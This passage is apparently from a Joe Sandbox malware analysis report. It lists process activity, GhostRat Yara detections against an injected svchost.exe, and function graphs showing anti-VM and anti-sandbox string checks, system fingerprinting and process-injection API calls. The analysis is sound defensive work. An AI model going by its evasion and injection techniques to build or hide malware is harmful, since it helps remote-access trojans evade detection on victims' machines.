                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5696 -s 480
                                                                                                            Imagebase:0x880000
                                                                                                            File size:483'680 bytes
                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:8
                                                                                                            Start time:00:39:11
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                            Imagebase:0x7ff7e52b0000
                                                                                                            File size:55'320 bytes
                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:9
                                                                                                            Start time:00:39:13
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                                                            Imagebase:0x7ff7e52b0000
                                                                                                            File size:55'320 bytes
                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:11
                                                                                                            Start time:00:39:16
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Users\Public\Documents\upupoo-classicshell.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\Public\Documents\upupoo-classicshell.exe"
                                                                                                            Imagebase:0xc20000
                                                                                                            File size:198'920 bytes
                                                                                                            MD5 hash:606CDA46E88CE86AE85AC92B2B560D0A
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:12
                                                                                                            Start time:00:39:17
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:svchost.exe
                                                                                                            Imagebase:0x420000
                                                                                                            File size:46'504 bytes
                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 0000000C.00000003.2318618858.0000000002C6B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 0000000C.00000002.3346097174.0000000004852000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 0000000C.00000003.2318479368.0000000002C6B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 0000000C.00000003.2318739703.0000000004984000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 0000000C.00000003.2318479368.0000000002C39000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 0000000C.00000002.3349931132.00000000052B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 0000000C.00000003.2318739703.0000000004912000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 0000000C.00000003.2338206272.0000000004852000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 0000000C.00000002.3347172652.0000000004984000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 0000000C.00000002.3349260884.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 0000000C.00000003.2308042453.0000000002C32000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:14
                                                                                                            Start time:00:39:19
                                                                                                            Start date:07/10/2024
                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1308 -s 488
                                                                                                            Imagebase:0x880000
                                                                                                            File size:483'680 bytes
                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Disassembly

                                                                                                            Reset < >

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:1.8%
                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                              Signature Coverage:47.5%
                                                                                                              Total number of Nodes:179
                                                                                                              Total number of Limit Nodes:15
                                                                                                              execution_graph 46436 7ff689643648 46437 7ff689727ba0 46436->46437 46439 7ff689727bc6 46437->46439 46440 7ff689727a58 46437->46440 46441 7ff689727aaf 46440->46441 46442 7ff689727b2b 46441->46442 46443 7ff689727b21 46441->46443 46461 7ff68972780c 46442->46461 46447 7ff689727528 46443->46447 46446 7ff689727b29 46446->46439 46448 7ff689727543 46447->46448 46449 7ff6897279a1 46448->46449 46455 7ff68972785e _tzset 46448->46455 46460 7ff6897276e1 46448->46460 46450 7ff689727b2b 46449->46450 46451 7ff689727b21 46449->46451 46452 7ff68972780c _tzset 2 API calls 46450->46452 46453 7ff689727528 _tzset 2 API calls 46451->46453 46454 7ff689727b29 46452->46454 46453->46454 46454->46446 46456 7ff6897278df WideCharToMultiByte 46455->46456 46457 7ff689727964 46455->46457 46458 7ff689727918 WideCharToMultiByte 46456->46458 46457->46446 46458->46457 46460->46446 46462 7ff68972781d 46461->46462 46467 7ff6897279a1 46462->46467 46469 7ff68972785e _tzset 46462->46469 46463 7ff689727b2b 46465 7ff68972780c _tzset 2 API calls 46463->46465 46464 7ff689727b21 46466 7ff689727528 _tzset 2 API calls 46464->46466 46468 7ff689727b29 46465->46468 46466->46468 46467->46463 46467->46464 46468->46446 46470 7ff6897278df WideCharToMultiByte 46469->46470 46471 7ff689727964 46469->46471 46472 7ff689727918 WideCharToMultiByte 46470->46472 46471->46446 46472->46471 46533 7ff689643d78 46534 7ff6896547b0 46533->46534 46535 7ff68965480c NtQueryInformationProcess 46534->46535 46535->46534 46536 7ff68965482e 46535->46536 46537 7ff689654857 46536->46537 46538 7ff68965483e RtlNtStatusToDosError 46536->46538 46538->46537 46474 7ff689642667 46475 7ff689668310 46474->46475 46476 7ff689668355 DuplicateHandle 46475->46476 46477 7ff68966839a 46476->46477 46478 7ff689646bcc 46479 7ff689666104 46478->46479 46491 7ff68964243c 46479->46491 46481 7ff689666177 46494 7ff689641717 46481->46494 46483 7ff689666197 46498 7ff68964427d 46483->46498 46485 7ff6896661c4 46486 7ff68964427d SetInformationJobObject 46485->46486 46487 7ff6896661f6 GetCurrentProcess 46486->46487 46488 7ff689666209 46487->46488 46502 7ff689642ea0 46488->46502 46490 7ff689666214 46491->46481 46492 7ff689668600 VirtualAllocEx 46491->46492 46493 7ff689668652 Concurrency::details::SchedulerBase::SchedulerBase 46492->46493 46493->46481 46494->46483 46495 7ff6896687a4 46494->46495 46496 7ff6896687ed WriteProcessMemory 46495->46496 46497 7ff689668812 46496->46497 46497->46483 46498->46485 46499 7ff689668554 46498->46499 46500 7ff6896685a3 SetInformationJobObject 46499->46500 46501 7ff6896685c2 46500->46501 46501->46485 46502->46490 46503 7ff689667fd8 46502->46503 46504 7ff689668021 AssignProcessToJobObject 46503->46504 46505 7ff68966803a 46504->46505 46505->46490 46539 7ff689648323 46540 7ff6896556c0 46539->46540 46541 7ff6896556d2 46540->46541 46543 7ff689643779 46540->46543 46543->46541 46544 7ff6896556dc 46543->46544 46545 7ff6896556f2 CloseHandle 46544->46545 46546 7ff6896556ff 46544->46546 46545->46546 46546->46541 46547 7ff6896485e4 46548 7ff6896659b4 46547->46548 46550 7ff689665a1d 46548->46550 46551 7ff6896415d2 std::bad_exception::bad_exception 46548->46551 46551->46550 46552 7ff689644d04 46553 7ff6896621d0 46552->46553 46557 7ff68964350d 46553->46557 46555 7ff689662219 46556 7ff68966223f ShellExecuteEx 46555->46556 46557->46555 46558 7ff68965dbe0 LoadLibraryA 46557->46558 46559 7ff68965dc06 46558->46559 46560 7ff68965dbf4 GetProcAddress 46558->46560 46559->46555 46560->46559 46506 7ff6896449f3 _Getdateorder 46507 7ff68969d890 46506->46507 46510 7ff68964489a __crtGetLocaleInfoEx 46507->46510 46509 7ff68969d8bc 46510->46509 46511 7ff68969d558 46510->46511 46512 7ff68969d5a3 46511->46512 46513 7ff68969d58c 46511->46513 46515 7ff68969d5a8 GetLocaleInfoW 46512->46515 46514 7ff68969d594 GetLocaleInfoEx 46513->46514 46516 7ff68969d5b8 46514->46516 46515->46516 46516->46509 46561 7ff689644b83 46562 7ff689664a64 46561->46562 46583 7ff689641361 46562->46583 46564 7ff689664c52 46565 7ff6896654f0 46564->46565 46587 7ff689642cde 46564->46587 46567 7ff6896427f2 3 API calls 46565->46567 46582 7ff689665407 46567->46582 46568 7ff689664c6c 46568->46565 46603 7ff68964437c 46568->46603 46570 7ff689664c93 46570->46565 46610 7ff689641fb4 46570->46610 46572 7ff689664ca0 46572->46565 46573 7ff689664ca8 46572->46573 46574 7ff6896654c4 46573->46574 46576 7ff689664ce8 46573->46576 46575 7ff6896427f2 3 API calls 46574->46575 46575->46582 46615 7ff6896414d8 46576->46615 46578 7ff6896653b2 46625 7ff6896423bf 46578->46625 46580 7ff6896653be 46580->46582 46628 7ff6896427f2 46580->46628 46583->46564 46584 7ff689660ec4 LoadLibraryW 46583->46584 46585 7ff689660f77 GetProcAddress GetProcAddress GetProcAddress 46584->46585 46586 7ff689660fb0 try_get_function 46584->46586 46585->46586 46586->46564 46587->46568 46588 7ff689661634 LoadLibraryA LoadLibraryA 46587->46588 46589 7ff6896616b0 46588->46589 46598 7ff689661a1c try_get_function 46588->46598 46590 7ff6896616b9 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 46589->46590 46589->46598 46591 7ff68966178e 46590->46591 46590->46598 46592 7ff68966192c GetComputerNameA 46591->46592 46591->46598 46593 7ff68966194e 46592->46593 46592->46598 46594 7ff689661992 GetSystemInfo 46593->46594 46593->46598 46595 7ff6896619a5 46594->46595 46596 7ff6896619c5 GetLogicalDriveStringsA 46595->46596 46595->46598 46597 7ff6896619da GlobalMemoryStatusEx 46596->46597 46596->46598 46599 7ff6896619f2 46597->46599 46598->46568 46599->46598 46600 7ff689661a33 GetAdaptersInfo 46599->46600 46601 7ff689661a45 46600->46601 46602 7ff689661a60 GetAdaptersInfo 46600->46602 46601->46598 46601->46602 46602->46598 46603->46570 46604 7ff689660748 LoadLibraryW 46603->46604 46605 7ff6896607d2 GetProcAddress IsDebuggerPresent 46604->46605 46606 7ff6896607c5 IsDebuggerPresent 46604->46606 46607 7ff6896607ec 46605->46607 46608 7ff6896607fe try_get_function 46605->46608 46606->46608 46607->46608 46609 7ff6896607f1 GetCurrentProcess 46607->46609 46608->46570 46609->46608 46610->46572 46611 7ff68966085c LoadLibraryA 46610->46611 46612 7ff68966089f GetProcAddress 46611->46612 46614 7ff6896608d9 try_get_function 46611->46614 46613 7ff6896608c8 GlobalMemoryStatusEx 46612->46613 46612->46614 46613->46614 46614->46572 46615->46578 46616 7ff689661f70 GetModuleHandleA 46615->46616 46617 7ff689662012 GetProcAddress GetProcAddress 46616->46617 46621 7ff6896620a1 46616->46621 46618 7ff689662046 46617->46618 46617->46621 46618->46621 46622 7ff689662059 GetProcAddress GetProcAddress 46618->46622 46619 7ff6896620cc GetModuleHandleA FindResourceA LoadResource SizeofResource LockResource 46620 7ff689662195 46619->46620 46620->46578 46621->46619 46622->46621 46623 7ff68966208b 46622->46623 46623->46621 46624 7ff689662090 46623->46624 46624->46578 46625->46580 46626 7ff689663a90 GetModuleFileNameA 46625->46626 46627 7ff689663acc 46626->46627 46627->46580 46628->46582 46629 7ff6896601b8 LoadLibraryW 46628->46629 46630 7ff689660235 GetProcAddress 46629->46630 46631 7ff689660257 try_get_function 46629->46631 46630->46631 46632 7ff689660247 MessageBoxW 46630->46632 46631->46582 46632->46631 46633 7ff6896410c3 _Thrd_sleep 46635 7ff68966b1dc 46633->46635 46634 7ff68966b210 Sleep 46634->46635 46635->46634 46636 7ff68966b23c 46635->46636 46517 7ff689647d92 std::locale::_Locimp::_Makeloc 46520 7ff68966dfa8 std::locale::_Locimp::_Makeloc 46517->46520 46519 7ff68966e481 std::locale::_Locimp::_Makeloc 46525 7ff689645f15 46519->46525 46523 7ff689641d57 std::locale::_Locimp::_Makexloc 46520->46523 46522 7ff68966e4a3 46523->46519 46524 7ff689698330 46523->46524 46524->46519 46525->46522 46527 7ff6896838cc std::locale::_Locimp::_Makeloc 46525->46527 46529 7ff689683c33 std::locale::_Locimp::_Makeloc 46527->46529 46531 7ff689641271 numpunct 46527->46531 46530 7ff689683fbd std::locale::_Locimp::_Makeloc 46529->46530 46532 7ff689643283 messages messages 46529->46532 46530->46522 46531->46529 46532->46530 46637 7ff689647fc2 std::locale::_Locimp::_Locimp 46638 7ff689669d88 46637->46638

                                                                                                              Executed Functions

                                                                                                              Function 00007FF689642CDE Relevance: 84.3, APIs: 21, Strings: 27, Instructions: 284libraryloaderCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 7ff689642cde-7ff6896616aa LoadLibraryA * 2 2 7ff689661b6f 0->2 3 7ff6896616b0-7ff6896616b3 0->3 5 7ff689661b71-7ff689661b84 2->5 3->2 4 7ff6896616b9-7ff689661788 GetProcAddress * 5 3->4 6 7ff689661b5d-7ff689661b69 call 7ff6897a8128 * 2 4->6 7 7ff68966178e-7ff689661791 4->7 6->2 7->6 9 7ff689661797-7ff68966179a 7->9 9->6 11 7ff6896617a0-7ff6896617a3 9->11 11->6 12 7ff6896617a9-7ff6896617ac 11->12 12->6 14 7ff6896617b2-7ff689661948 call 7ff6896454a7 GetComputerNameA 12->14 14->6 17 7ff68966194e-7ff689661962 call 7ff689649b56 14->17 20 7ff689661966-7ff68966197c call 7ff6896478ba 17->20 23 7ff689661b39-7ff689661b45 call 7ff6897a8128 * 2 20->23 24 7ff689661982-7ff689661990 20->24 33 7ff689661b4b 23->33 24->20 26 7ff689661992-7ff6896619a3 GetSystemInfo 24->26 28 7ff6896619a5-7ff6896619ad 26->28 29 7ff6896619af-7ff6896619d4 call 7ff6896454a7 GetLogicalDriveStringsA 26->29 28->29 31 7ff689661a1c-7ff689661a2e call 7ff6897a8128 * 2 28->31 29->23 36 7ff6896619da-7ff6896619f0 GlobalMemoryStatusEx 29->36 37 7ff689661b4d-7ff689661b5b call 7ff689642a22 31->37 33->37 39 7ff6896619f2-7ff6896619fe 36->39 40 7ff689661a04-7ff689661a1a call 7ff689645d35 36->40 37->5 39->23 39->40 40->31 47 7ff689661a33-7ff689661a43 GetAdaptersInfo 40->47 48 7ff689661a45-7ff689661a5e call 7ff68964484f call 7ff689645d35 47->48 49 7ff689661a60-7ff689661a6f GetAdaptersInfo 47->49 48->31 48->49 50 7ff689661b2c-7ff689661b34 call 7ff68964484f 49->50 51 7ff689661a75-7ff689661a7b 49->51 50->23 51->50 53 7ff689661a81-7ff689661a95 call 7ff689649b56 51->53 61 7ff689661a99-7ff689661ac3 call 7ff689649b56 call 7ff689645bff 53->61 66 7ff689661af7-7ff689661b2a call 7ff68964484f call 7ff6897a8128 * 2 call 7ff689642a22 * 2 61->66 67 7ff689661ac5-7ff689661adf call 7ff689642a22 61->67 66->33 67->61 73 7ff689661ae1-7ff689661af3 call 7ff689642a22 67->73 73->53 78 7ff689661af5 73->78 78->50
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$Free$AddressProc$Info$AdaptersLoad$ComputerDriveGlobalLogicalMemoryNameStatusStringsSystem
                                                                                                              • String ID: .dll$.dll$GetS$avasvbox$avg$bitdoxvirttvboxvirtsandmalwvmwacuckavasvbox$cuckavasvbox$der$el32$gsA$ice$iphl$kern$mInf$malwvmwacuckavasvbox$papi$qemu$re$serv$trin$ual$usEx$vbox$vbox$vboxvirtsandmalwvmwacuckavasvbox$virttvboxvirtsandmalwvmwacuckavasvbox$yste
                                                                                                              • API String ID: 521130867-3252873104
                                                                                                              • Opcode ID: 3b89a149c47e2ab1268961066b91b0b10c5194608dd43912f8c2b265ce9dc320
                                                                                                              • Instruction ID: 84ab1c9fc9fe3dbceda070cc8f8ee60edb51183378a844831e9222fadba18029
                                                                                                              • Opcode Fuzzy Hash: 3b89a149c47e2ab1268961066b91b0b10c5194608dd43912f8c2b265ce9dc320
                                                                                                              • Instruction Fuzzy Hash: 3AE17132A09781DAE721CF61E8402ED37A0FF55B99F504239DA4D5BB58EF38D685CB00
                                                                                                              Function 00007FF6896414D8 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 199libraryloaderCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProcResource$HandleModule$FindLoadLockSizeof
                                                                                                              • String ID: GetPddre$LoadaryAGetPddre$MoveAkern.dllLoadaryAGetPddre$ddre$eA$kern.dllLoadaryAGetPddre$ss
                                                                                                              • API String ID: 3384031397-1216065373
                                                                                                              • Opcode ID: 2b9afb961e81307596f16013bcdb1345da380b4477b8ad138d7866a2b3849765
                                                                                                              • Instruction ID: 95b1094d3784b04f83c715663c2461afdce449a4f8e4c4acd2fb66040b08d2b2
                                                                                                              • Opcode Fuzzy Hash: 2b9afb961e81307596f16013bcdb1345da380b4477b8ad138d7866a2b3849765
                                                                                                              • Instruction Fuzzy Hash: FF513465A09A92CAFB048FA1E8143A832A0BF44BCAF54403DCE4D9AB59DF7CD544CB04
                                                                                                              Function 00007FF689641361 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 114libraryloaderCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressLibraryProc$Free$Load
                                                                                                              • String ID: Coun$Freq$GetT$ickC$ount$ter$uenc
                                                                                                              • API String ID: 3262421712-2732439934
                                                                                                              • Opcode ID: 2c33b76a8132c095a3d2536de20ecc734e02814c7917a0aaabf729632f2b899f
                                                                                                              • Instruction ID: 8c3482f787ee74ccd70251b1b7cbbab882d88141a07db310864d59e9e71256f9
                                                                                                              • Opcode Fuzzy Hash: 2c33b76a8132c095a3d2536de20ecc734e02814c7917a0aaabf729632f2b899f
                                                                                                              • Instruction Fuzzy Hash: 30517932B09A42CEFB12DFB5D0402AC67A1BF55BC9F054139DE0D66A58EF78E18AC700
                                                                                                              Function 00007FF689727528 Relevance: 16.4, APIs: 3, Strings: 6, Instructions: 634timeCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 145 7ff689727528-7ff68972755c call 7ff689646f28 call 7ff689647ebe 150 7ff689727761-7ff689727836 call 7ff68964579a call 7ff689646f28 call 7ff689647ebe 145->150 151 7ff689727562-7ff68972756d call 7ff689647fa4 145->151 175 7ff6897279cb-7ff689727ab1 call 7ff68964579a call 7ff689647086 150->175 176 7ff68972783c-7ff689727847 call 7ff689647fa4 150->176 157 7ff68972774c-7ff689727760 call 7ff68964579a 151->157 158 7ff689727573-7ff68972757d 151->158 157->150 160 7ff68972757f-7ff689727585 158->160 161 7ff6897275a5-7ff6897275ae call 7ff689648e3b 158->161 164 7ff689727588-7ff689727593 160->164 173 7ff6897275b1-7ff6897275b8 161->173 168 7ff68972759d-7ff68972759f 164->168 169 7ff689727595-7ff68972759b 164->169 168->161 172 7ff6897276fc-7ff68972770c 168->172 169->164 169->168 173->173 174 7ff6897275ba-7ff6897275da call 7ff6896435bc call 7ff689648e3b 173->174 174->172 192 7ff6897275e0-7ff6897275e7 174->192 195 7ff689727aba-7ff689727abd 175->195 196 7ff689727ab3-7ff689727ab8 175->196 185 7ff6897279b6-7ff6897279ca call 7ff68964579a 176->185 186 7ff68972784d-7ff689727858 call 7ff6896441ec 176->186 185->175 198 7ff68972785e-7ff689727878 call 7ff689648e3b call 7ff6897a84f0 186->198 199 7ff6897279a1-7ff6897279b5 call 7ff68964579a 186->199 192->192 197 7ff6897275e9-7ff6897275f7 call 7ff689649435 192->197 201 7ff689727abf-7ff689727ac2 195->201 202 7ff689727ac4-7ff689727ad4 call 7ff6896435bc 195->202 200 7ff689727b08-7ff689727b1a 196->200 214 7ff689727737-7ff68972774b call 7ff68964579a 197->214 215 7ff6897275fd-7ff689727617 call 7ff689646672 197->215 218 7ff68972787e-7ff689727881 198->218 199->185 206 7ff689727b2b call 7ff68972780c 200->206 207 7ff689727b1c-7ff689727b1f 200->207 201->200 221 7ff689727ad6 202->221 222 7ff689727adf-7ff689727afa call 7ff689647086 202->222 224 7ff689727b30-7ff689727b5c call 7ff689648e3b call 7ff68964847c 206->224 207->206 212 7ff689727b21-7ff689727b29 call 7ff689727528 207->212 212->224 214->157 238 7ff68972761d-7ff689727620 215->238 239 7ff689727722-7ff689727736 call 7ff68964579a 215->239 225 7ff689727887-7ff6897278a9 218->225 226 7ff68972797a-7ff6897279a0 call 7ff68964266c call 7ff689648ac6 call 7ff6896459fc 218->226 229 7ff689727ad8-7ff689727add call 7ff689648e3b 221->229 241 7ff689727afc-7ff689727aff 222->241 242 7ff689727b01-7ff689727b03 call 7ff689648e3b 222->242 234 7ff6897278ab-7ff6897278b0 225->234 235 7ff6897278b3-7ff6897278ba 225->235 229->201 234->235 244 7ff6897278bc-7ff6897278c4 235->244 245 7ff6897278d4-7ff6897278d7 235->245 248 7ff68972762b-7ff689727635 238->248 249 7ff689727622-7ff689727629 238->249 239->214 241->229 242->200 244->245 253 7ff6897278c6-7ff6897278d2 244->253 254 7ff6897278da-7ff689727916 call 7ff689645ae7 WideCharToMultiByte 245->254 256 7ff689727637 248->256 257 7ff68972763a-7ff689727648 call 7ff689644895 248->257 249->238 249->248 253->254 267 7ff689727926-7ff689727929 254->267 268 7ff689727918-7ff68972791b 254->268 256->257 265 7ff68972764b-7ff68972764f 257->265 269 7ff689727657-7ff68972765a 265->269 270 7ff689727651-7ff689727655 265->270 272 7ff68972792c-7ff689727962 WideCharToMultiByte 267->272 268->267 271 7ff68972791d-7ff689727924 268->271 269->265 270->269 273 7ff68972765c-7ff68972765f 270->273 271->272 274 7ff689727973-7ff689727977 272->274 275 7ff689727964-7ff689727967 272->275 276 7ff6897276ad-7ff6897276b0 273->276 277 7ff689727661-7ff689727677 call 7ff689644895 273->277 274->226 275->274 278 7ff689727969-7ff689727971 275->278 279 7ff6897276b7-7ff6897276c5 276->279 280 7ff6897276b2-7ff6897276b4 276->280 286 7ff689727680-7ff689727684 277->286 278->226 282 7ff6897276c7-7ff6897276dd call 7ff689646672 279->282 283 7ff6897276e1-7ff6897276e5 279->283 280->279 287 7ff6897276e8-7ff6897276fa call 7ff68964266c call 7ff689648ac6 282->287 292 7ff6897276df-7ff689727721 call 7ff68964579a 282->292 283->287 289 